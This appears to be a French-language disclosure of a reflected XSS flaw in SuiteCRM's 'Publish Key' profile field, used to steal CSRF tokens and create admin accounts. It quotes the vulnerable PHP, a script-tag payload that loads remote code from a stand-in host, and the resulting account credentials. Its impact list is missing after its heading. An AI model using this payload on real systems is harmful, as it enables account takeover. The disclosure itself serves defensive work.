
Une vulnérabilité de sécurité dans SuiteCRM qui peut être exploitée pour voler des jetons CSRF et effectuer des actions non autorisées, telles que la création de nouveaux utilisateurs administrateurs sans authentification appropriée.
Le champ « Publish Key » de la page Edit Profile de SuiteCRM est vulnérable à une Cross-Site Scripting réfléchie (XSS), permettant à un attaquant d'injecter du code JavaScript malveillant. Cela peut être exploité pour voler des jetons CSRF et effectuer des actions non autorisées, telles que la création de nouveaux utilisateurs administrateurs sans authentification appropriée.
La vulnérabilité provient d'une validation et d'un assainissement insuffisants du champ Publish Key dans l'application SuiteCRM. Lorsqu'un attaquant injecte un script malveillant, celui-ci s'exécute dans le contexte de la session d'un utilisateur authentifié. Le script injecté (o.js) utilise ensuite le jeton CSRF capturé pour forger des requêtes qui créent de nouveaux utilisateurs administrateurs, compromettant ainsi l'intégrité et la sécurité de l'instance CRM.
Cette vulnérabilité est un problème critique de Cross-Site Scripting (XSS). Son impact comprend :
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Username - imposter
Password - ok